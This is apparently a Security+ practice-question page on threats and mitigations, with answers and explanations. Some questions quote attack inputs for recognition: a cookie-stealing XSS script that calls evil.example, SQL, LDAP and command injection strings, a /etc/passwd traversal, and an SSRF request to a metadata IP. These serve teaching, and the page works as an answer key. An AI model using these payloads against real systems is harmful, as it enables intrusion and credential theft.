Domain 2.0 — Threats, Vulnerabilities, and Mitigations¶
← Back to Security+ overview · Domain weight: 22%
Q019. Phishing vs spear phishing¶
An attacker sends a tailored email to the CFO referencing a recent acquisition and asking for urgent wire-transfer approval. What is this?
- A. Spear phishing
- B. Pharming
- C. Smishing
- D. Dumpster diving
Answer: A — Spear phishing
Why: It is targeted and personalized. Generic phishing is broader; smishing uses SMS; pharming redirects users to fraudulent sites.
Q020. Whaling¶
A phishing campaign targets only senior executives with customized legal-document lures. What is the best label?
- A. Whaling
- B. Watering hole
- C. Tailgating
- D. Evil twin
Answer: A — Whaling
Why: Whaling is phishing targeted at high-value executives or senior leaders.
Q021. Smishing¶
Users receive text messages claiming their bank account is locked and asking them to click a link. What attack vector is this?
- A. Vishing
- B. Smishing
- C. Prepending
- D. Invoice fraud
Answer: B — Smishing
Why: Smishing is phishing over SMS/text messaging.
Q022. Vishing¶
An attacker calls the help desk pretending to be an employee and asks for a password reset. What is the most precise term?
- A. Vishing
- B. Typosquatting
- C. SQL injection
- D. Credential stuffing
Answer: A — Vishing
Why: Vishing is voice-based phishing/social engineering.
Q023. Watering-hole attack¶
Employees of a defense contractor are compromised after visiting a small industry association website that attackers infected with malware. What attack is this?
- A. Watering-hole attack
- B. Brute-force attack
- C. Bluejacking
- D. Pass-the-hash
Answer: A — Watering-hole attack
Why: Attackers compromise a site commonly visited by the intended victims.
Q024. Credential stuffing¶
A login portal receives thousands of attempts using username/password pairs from unrelated public breaches. Which attack is occurring?
- A. Password spraying
- B. Credential stuffing
- C. Dictionary attack
- D. Kerberoasting
Answer: B — Credential stuffing
Why: Credential stuffing uses known breached credentials against other services.
Q025. Password spraying¶
An attacker tries Spring2026! against thousands of accounts and waits between attempts to avoid lockouts. What is this?
- A. Password spraying
- B. Credential stuffing
- C. Rainbow-table attack
- D. Session fixation
Answer: A — Password spraying
Why: Password spraying uses one or a few common passwords across many accounts.
Q026. Brute force mitigation¶
Which control most directly reduces the risk of online password brute forcing?
- A. Account lockout or rate limiting
- B. File integrity monitoring
- C. Disk encryption
- D. Log normalization
Answer: A — Account lockout or rate limiting
Why: Online guessing attacks are slowed or blocked by rate limits, lockouts, and adaptive authentication.
Q027. SQL injection indicator¶
A web server log shows this request: /product?id=10 OR 1=1--. What vulnerability is likely being tested?
- A. SQL injection
- B. XML external entity injection
- C. Cross-site request forgery
- D. Directory traversal
Answer: A — SQL injection
Why: The input attempts to alter SQL logic so the condition always evaluates true.
Q028. XSS¶
A comment field stores <script>fetch('https://evil.example/c?'+document.cookie)</script> and runs it for every visitor. What is this?
- A. Stored cross-site scripting
- B. Reflected cross-site scripting
- C. SQL injection
- D. LDAP injection
Answer: A — Stored cross-site scripting
Why: The malicious script is saved by the application and later served to other users.
Q029. CSRF¶
A user who is already logged into a banking site visits a malicious page that silently submits a transfer request to the bank. What attack is this?
- A. Cross-site request forgery
- B. Cross-site scripting
- C. DNS poisoning
- D. Directory traversal
Answer: A — Cross-site request forgery
Why: CSRF abuses the victim's existing authenticated session to submit an unwanted action.
Q030. Directory traversal¶
A request contains ../../../../etc/passwd. What type of attack is being attempted?
- A. Directory traversal
- B. Race condition
- C. Buffer overflow
- D. ARP poisoning
Answer: A — Directory traversal
Why: The attacker is trying to escape the intended web directory and access filesystem paths.
Q031. Race condition¶
Two transactions withdraw money at the same time and both pass the balance check before either updates the account. What vulnerability class is this?
- A. Race condition
- B. Integer overflow
- C. Reflected XSS
- D. DNS tunneling
Answer: A — Race condition
Why: System behavior depends on timing between operations, allowing state checks to be bypassed.
Q032. Buffer overflow¶
A program crashes when a user supplies input much longer than expected, and the instruction pointer is overwritten. What vulnerability is likely present?
- A. Buffer overflow
- B. CSRF
- C. SSRF
- D. Insecure deserialization
Answer: A — Buffer overflow
Why: Excess input overwrites adjacent memory, potentially allowing code execution.
Q033. Insecure deserialization¶
An application accepts a serialized object from a user and instantiates it without validation, resulting in remote code execution. What vulnerability is this?
- A. Insecure deserialization
- B. Clickjacking
- C. Password spraying
- D. MAC flooding
Answer: A — Insecure deserialization
Why: Untrusted serialized data can manipulate object creation and application logic.
Q034. SSRF¶
A cloud metadata service is reachable only from inside an instance. An attacker abuses a web app's URL-fetch feature to request http://169.254.169.254/. What is this?
- A. Server-side request forgery
- B. Client-side request forgery
- C. Typosquatting
- D. DNSSEC bypass
Answer: A — Server-side request forgery
Why: The attacker causes the server to make a request to an internal or privileged endpoint.
Q035. Evil twin¶
Users connect to a rogue wireless network named the same as the corporate SSID. The attacker captures login attempts. What is this?
- A. Evil twin
- B. Jamming
- C. Bluebugging
- D. On-path attack only
Answer: A — Evil twin
Why: An evil twin is a malicious wireless access point impersonating a legitimate SSID.
Q036. On-path attack¶
An attacker intercepts and modifies traffic between a client and a server while both believe they are communicating directly. What attack is this?
- A. On-path attack
- B. Watering-hole attack
- C. Supply-chain attack
- D. Logic bomb
Answer: A — On-path attack
Why: Formerly called man-in-the-middle, this attack places the attacker in the communication path.
Q037. DNS poisoning¶
Users type the correct domain but are sent to a fake IP address due to corrupted resolver cache entries. What attack is this?
- A. DNS poisoning
- B. ARP spoofing
- C. BGP route summarization
- D. DHCP starvation
Answer: A — DNS poisoning
Why: DNS cache/resolution data has been manipulated to redirect users.
Q038. ARP spoofing¶
A host on a LAN sends fake ARP replies claiming the default gateway's IP address maps to the attacker's MAC address. What is this?
- A. ARP poisoning
- B. DNSSEC validation
- C. VLAN hopping
- D. Deauthentication
Answer: A — ARP poisoning
Why: ARP poisoning manipulates local IP-to-MAC resolution.
Q039. Supply-chain attack¶
A trusted software vendor's update server is compromised and distributes signed malware to customers. What attack category is this?
- A. Supply-chain attack
- B. Credential stuffing
- C. Shoulder surfing
- D. Pharming
Answer: A — Supply-chain attack
Why: The attacker compromises a trusted supplier path rather than attacking each victim directly.
Q040. Zero-day¶
A vulnerability is actively exploited before the vendor has released a patch. What is it called?
- A. Zero-day
- B. Legacy system
- C. End-of-life software
- D. CVSS environmental score
Answer: A — Zero-day
Why: A zero-day is exploited before a fix is available or widely known.
Q041. Vulnerability vs threat¶
An unpatched OpenSSL library exists on a server. What is this best described as?
- A. Vulnerability
- B. Threat actor
- C. Risk acceptance
- D. Exposure factor
Answer: A — Vulnerability
Why: A vulnerability is a weakness. The attacker is the threat actor; business impact probability is risk.
Q042. Threat actor motivation¶
A criminal group encrypts company data and demands cryptocurrency payment. What is the primary motivation?
- A. Financial gain
- B. Espionage
- C. Ideology
- D. Mischief only
Answer: A — Financial gain
Why: Ransomware crews are usually financially motivated.
Q043. APT¶
A nation-state group spends months maintaining stealthy access to steal research data. What label best fits?
- A. Advanced persistent threat
- B. Insider threat only
- C. Script kiddie
- D. Hacktivist
Answer: A — Advanced persistent threat
Why: APTs are typically skilled, resourced, stealthy, and persistent.
Q044. Insider threat¶
A disgruntled employee exports customer records before resigning. What threat category is this?
- A. Insider threat
- B. Logic bomb only
- C. Rogue AP
- D. Shadow IT
Answer: A — Insider threat
Why: The actor has legitimate internal access and abuses it.
Q045. IoC vs IoA¶
A file hash associated with known malware is found on a workstation. What is this?
- A. Indicator of compromise
- B. Indicator of attack only
- C. Risk appetite
- D. Exposure factor
Answer: A — Indicator of compromise
Why: A known malicious artifact on a system is an IoC. IoAs focus more on attacker behavior patterns.
Q046. YARA¶
A malware analyst wants to search files for known byte patterns and strings associated with a malware family. Which tool/rule type is most appropriate?
- A. YARA
- B. CVSS
- C. SAML
- D. SCEP
Answer: A — YARA
Why: YARA rules identify malware-like files based on textual or binary patterns.
Q047. CVSS purpose¶
A vulnerability report lists CVSS base score 9.8. What does the score primarily communicate?
- A. Technical severity of the vulnerability
- B. Cost of remediation
- C. Guaranteed exploitability in this environment
- D. Legal impact
Answer: A — Technical severity of the vulnerability
Why: CVSS helps rate severity. It does not automatically equal business risk without environmental context.
Q048. Patch management¶
A critical remote-code-execution vulnerability affects internet-facing VPN appliances. What is the most appropriate mitigation after testing?
- A. Apply the vendor patch or recommended fix
- B. Rename the admin account only
- C. Disable logs
- D. Increase password length only
Answer: A — Apply the vendor patch or recommended fix
Why: Patching/remediation directly removes or reduces the vulnerable condition.
Q049. Segmentation as mitigation¶
A flat network allows malware on one workstation to reach database servers directly. Which mitigation best limits lateral movement?
- A. Network segmentation
- B. Public DNS
- C. URL shortening
- D. Increasing DHCP lease time
Answer: A — Network segmentation
Why: Segmentation limits which systems can communicate and reduces blast radius.
Q050. Input validation¶
Which control most directly reduces injection vulnerabilities?
- A. Server-side input validation and parameterized queries
- B. Longer session timeout
- C. Larger TLS key size only
- D. Higher password complexity only
Answer: A — Server-side input validation and parameterized queries
Why: Injection occurs when untrusted input is interpreted as commands or queries. Parameterization separates data from code.
Q051. EDR purpose¶
A workstation security tool detects suspicious process behavior, isolates the host, and provides timeline data. What tool category is this?
- A. EDR
- B. DLP
- C. CASB
- D. WAF only
Answer: A — Endpoint detection and response
Why: EDR monitors endpoints for suspicious activity and supports response actions.
Q143. XXE vulnerability¶
An XML parser fetches external entities and an attacker reads local files through a crafted XML payload. What vulnerability is this?
- A. XXE
- B. CSRF
- C. BGP hijack
- D. Evil twin
Answer: A — XXE
Why: XML External Entity injection abuses XML parser behavior that resolves external entities. Disable external entity resolution and use hardened parser settings.
Q144. NoSQL injection¶
A login API accepts JSON and passes user-controlled operators such as "$ne" directly into a MongoDB query. What is the likely issue?
- A. NoSQL injection
- B. ARP spoofing
- C. Password spraying
- D. Certificate transparency leak
Answer: A — NoSQL injection
Why: NoSQL injection occurs when untrusted input changes the intended query structure or operators. Validate structure and use safe query construction.
Q145. LDAP injection¶
A web form builds an LDAP filter by concatenating (uid= + input + ). An attacker submits *)(|(uid=*)). What is the vulnerability?
- A. LDAP injection
- B. DNS rebinding
- C. Race condition
- D. Tokenization failure
Answer: A — LDAP injection
Why: LDAP injection changes the intended directory query. Escape LDAP filter metacharacters and use safe APIs.
Q146. Command injection¶
A web app runs ping plus a user-supplied hostname through a shell. An attacker enters example.com; cat /etc/passwd. What should be fixed first?
- A. Avoid shell execution and validate/allowlist arguments
- B. Disable HTTPS
- C. Add more CPU
- D. Use GET instead of POST
Answer: A — Avoid shell execution and validate/allowlist arguments
Why: Command injection happens when untrusted input is interpreted by a shell. Avoid shells, use parameterized process APIs, and validate inputs.
Q147. BOLA/API authorization¶
An API endpoint /api/v1/invoices/8821 returns another customer's invoice when the numeric ID is changed. Authentication is present. What is missing?
- A. Object-level authorization check
- B. TLS
- C. Password complexity
- D. Rate limiting only
Answer: A — Object-level authorization check
Why: Broken Object Level Authorization is an API flaw where the service fails to verify the authenticated user is allowed to access the requested object.
Q148. Broken function-level authorization¶
A normal user changes the URL from /user/export to /admin/exportAll and successfully downloads all records. What is the issue?
- A. Broken function-level authorization
- B. Smishing
- C. DNSSEC failure
- D. Cipher downgrade only
Answer: A — Broken function-level authorization
Why: The application failed to enforce role/permission checks on a privileged function. Hiding admin links is not authorization.
Q149. JWT alg none¶
An API accepts a JWT where the header says alg: none and trusts the claims. What is the root problem?
- A. The verifier failed to enforce expected signing algorithm and signature validation
- B. The JWT was too short
- C. The JWT was encrypted
- D. The user had MFA
Answer: A — The verifier failed to enforce expected signing algorithm and signature validation
Why: JWT validation must enforce allowed algorithms, verify the signature, and validate issuer, audience, expiration, and related claims.
Q150. Session fixation¶
An attacker sends a victim a link containing a known session ID. After login, the app keeps that same session ID. What attack is this?
- A. Session fixation
- B. DNS tunneling
- C. Kerberoasting
- D. Clickjacking
Answer: A — Session fixation
Why: Session fixation works when an attacker can force or predict a session identifier that remains valid after authentication. Regenerate session IDs after login.
Q151. Clickjacking defense¶
A banking site appears inside a transparent iframe on an attacker page, causing users to click hidden buttons. What header helps prevent this?
- A. Content-Security-Policy frame-ancestors or X-Frame-Options
- B. MX record
- C. SPF hardfail
- D. DHCP snooping
Answer: A — Content-Security-Policy frame-ancestors or X-Frame-Options
Why: Frame restrictions prevent unauthorized embedding and reduce clickjacking risk. CSP frame-ancestors is the modern control.
Q152. CORS misconfiguration¶
An API returns Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true behavior through reflection of arbitrary origins. What is the practical risk?
- A. A malicious website may read authenticated API responses from a victim browser
- B. The server will stop using TLS
- C. DNS records will be poisoned
- D. NTP will drift
Answer: A — A malicious website may read authenticated API responses from a victim browser
Why: Overly permissive CORS with credentials can let attacker-controlled origins read sensitive browser-authenticated responses.
Q153. HTTP request smuggling¶
A reverse proxy and backend disagree about whether Content-Length or Transfer-Encoding controls request boundaries. What attack class is likely?
- A. HTTP request smuggling/desynchronization
- B. Credential stuffing
- C. Birthday attack
- D. Evil twin
Answer: A — HTTP request smuggling/desynchronization
Why: Request smuggling abuses parsing inconsistencies between front-end and back-end servers, often causing one user request to be interpreted as part of another.
Q154. DNS rebinding¶
A victim visits an attacker site. DNS first resolves to the attacker server, then quickly changes to a private IP so browser requests target an internal admin panel. What is this?
- A. DNS rebinding
- B. DNSSEC validation
- C. Zone transfer
- D. NXDOMAIN hijack
Answer: A — DNS rebinding
Why: DNS rebinding abuses browser trust and DNS TTL behavior to pivot from a public site into internal network targets.
Q155. BGP hijack impact¶
Traffic to a public prefix is suddenly routed through an unexpected autonomous system. What is the suspected issue?
- A. BGP route hijacking/leak
- B. LDAP injection
- C. CSRF
- D. RAID rebuild
Answer: A — BGP route hijacking/leak
Why: BGP hijacks or route leaks misdirect internet traffic by advertising incorrect routes. RPKI/ROA validation can reduce risk.
Q156. OAuth consent phishing¶
A user grants a malicious cloud app permission to read mailbox data. No password was stolen. What happened?
- A. OAuth consent phishing
- B. ARP spoofing
- C. SQL injection
- D. Disk wiping
Answer: A — OAuth consent phishing
Why: OAuth consent phishing tricks users into granting legitimate tokens/scopes to a malicious application. Review app consent and restrict high-risk permissions.
Q157. Device-code phishing¶
An attacker asks a victim to visit a legitimate Microsoft device-login URL and enter a code. The attacker receives tokens after the victim authenticates. What is this?
- A. OAuth device-code phishing
- B. Password spraying
- C. Golden ticket
- D. Bluetooth bluesnarfing
Answer: A — OAuth device-code phishing
Why: Device-code phishing abuses a legitimate device authorization flow. The user authenticates to the real provider, but authorizes the attacker's session.
Q158. Kerberoasting¶
An attacker with a normal domain account requests service tickets for SPNs and attempts offline password cracking. What attack is this?
- A. Kerberoasting
- B. ASLR bypass
- C. Clickjacking
- D. Typosquatting
Answer: A — Kerberoasting
Why: Kerberoasting targets service account passwords by cracking Kerberos service tickets offline. Use strong service account passwords/gMSA and monitor unusual TGS requests.
Q159. Golden ticket¶
An attacker obtains the KRBTGT key and forges long-lived Kerberos tickets. What is the attack called?
- A. Golden ticket
- B. Pass-the-hash
- C. Credential stuffing
- D. DNS tunneling
Answer: A — Golden ticket
Why: Golden tickets are forged TGTs created using the KRBTGT secret. Recovery requires KRBTGT rotation and broad investigation.
Q160. Pass-the-hash versus password cracking¶
An attacker authenticates to SMB using an NTLM hash without recovering the plaintext password. What attack is this?
- A. Pass-the-hash
- B. Rainbow collision
- C. Credential stuffing
- D. Watering hole
Answer: A — Pass-the-hash
Why: Pass-the-hash reuses a password hash as an authentication secret in compatible protocols. It does not require cracking the password.
Q161. Living off the land¶
Malware uses PowerShell, certutil, scheduled tasks, and WMI instead of dropping obvious custom binaries. What tactic does this describe?
- A. Living off the land
- B. SQL normalization
- C. WPA3 transition mode
- D. Data masking
Answer: A — Living off the land
Why: Living-off-the-land techniques abuse legitimate system tools to blend in and bypass simple allow/deny controls.
Q162. DLL sideloading¶
A trusted executable loads a malicious DLL from its working directory before the legitimate DLL. What technique is this?
- A. DLL sideloading/search-order hijacking
- B. OCSP stapling
- C. Salting
- D. Tokenization
Answer: A — DLL sideloading/search-order hijacking
Why: DLL sideloading abuses library search order or placement to make a legitimate process load malicious code.
Q163. Dependency confusion¶
A build system pulls a public package with the same name as an internal package because the public version number is higher. What is this?
- A. Dependency confusion
- B. Certificate pinning
- C. LDAP bind failure
- D. Race condition
Answer: A — Dependency confusion
Why: Dependency confusion exploits package manager resolution rules between private and public registries. Pin sources and configure private registries carefully.
Q164. Typosquatting package¶
A developer installs requestz instead of requests and runs malicious package code. What attack is this?
- A. Typosquatting
- B. Bluejacking
- C. Pass-the-ticket
- D. CORS preflight
Answer: A — Typosquatting
Why: Typosquatting relies on lookalike package or domain names. Use lockfiles, trusted registries, review package provenance, and scanning.
Q165. SBOM limitation¶
A vendor provides an SBOM. Which statement is most accurate?
- A. It lists components and helps vulnerability management, but it does not prove the software is secure
- B. It guarantees no vulnerabilities exist
- C. It replaces code signing
- D. It makes patching unnecessary
Answer: A — It lists components and helps vulnerability management, but it does not prove the software is secure
Why: An SBOM improves visibility into components and dependencies. It is not an assurance certificate or substitute for secure engineering.
Q166. CVE vs CWE¶
Which pair is correct?
- A. CVE identifies a specific disclosed vulnerability; CWE classifies a weakness type
- B. CWE identifies a single affected product version; CVE is a patch file
- C. CVE is a risk score; CWE is a firewall rule
- D. CVE and CWE are identical
Answer: A — CVE identifies a specific disclosed vulnerability; CWE classifies a weakness type
Why: CVE records specific vulnerabilities; CWE categorizes common weakness patterns such as SQL injection or buffer overflow.
Q167. CVSS versus EPSS¶
A vulnerability has high CVSS but low EPSS. What does that generally mean?
- A. Potential severity is high, but observed/estimated exploit likelihood is low
- B. The vulnerability is harmless
- C. The patch is fake
- D. It only affects printers
Answer: A — Potential severity is high, but observed/estimated exploit likelihood is low
Why: CVSS estimates technical severity. EPSS (FIRST.org's Exploit Prediction Scoring System) estimates probability of exploitation. Good prioritization considers both plus asset exposure. EPSS is not itself a named SY0-701 objective term, but the CVSS-vs-likelihood distinction it illustrates is.
Q168. Virtual patching¶
A critical web flaw cannot be fixed in the app for two weeks. A WAF rule blocks the exploit pattern temporarily. What is this called?
- A. Virtual patching
- B. Hashing
- C. Legal hold
- D. Token replay
Answer: A — Virtual patching
Why: Virtual patching adds a compensating control to reduce exploitability until the underlying software is fixed.
Q169. Web shell indicator¶
Which event most strongly suggests a web shell on a Linux web server?
- A. The web server process spawns
/bin/shand connects outbound to an unfamiliar IP - B. A cron job rotates logs
- C. NTP sync succeeds
- D. A certificate renews
Answer: A — The web server process spawns /bin/sh and connects outbound to an unfamiliar IP
Why: Web shells often cause web worker processes to execute shells or system commands and may create unusual outbound connections.
Q170. DNS tunneling¶
A host makes thousands of long, high-entropy subdomain queries to a domain it has never used before. What should analysts suspect?
- A. DNS tunneling or data exfiltration
- B. DHCP exhaustion only
- C. Certificate transparency
- D. WPA handshake capture
Answer: A — DNS tunneling or data exfiltration
Why: DNS tunneling often produces unusual query volume, long labels, high entropy, and suspicious authoritative domains.
Q171. BEC control¶
A CFO receives a realistic vendor-bank-change request from a compromised supplier mailbox. Which control best reduces loss?
- A. Out-of-band verification of payment changes using a known trusted contact path
- B. More complex Wi-Fi password
- C. Faster disk encryption
- D. Turning off logging
Answer: A — Out-of-band verification of payment changes using a known trusted contact path
Why: Business email compromise often abuses legitimate mailboxes and social engineering. Payment-change verification through known channels is key.
Q172. Resource exhaustion API abuse¶
An unauthenticated API endpoint performs expensive searches and an attacker sends many broad queries, driving up CPU and cloud cost. Which control is most direct?
- A. Rate limits, quotas, authentication, and bounded query cost
- B. Disable certificate validation
- C. Use longer passwords
- D. Turn off backups
Answer: A — Rate limits, quotas, authentication, and bounded query cost
Why: API resource consumption risk is reduced with rate limiting, quotas, auth, input bounds, caching, and cost-aware query controls.
← Domain 1 · Back to Security+ overview · Next: Domain 3 — Security Architecture →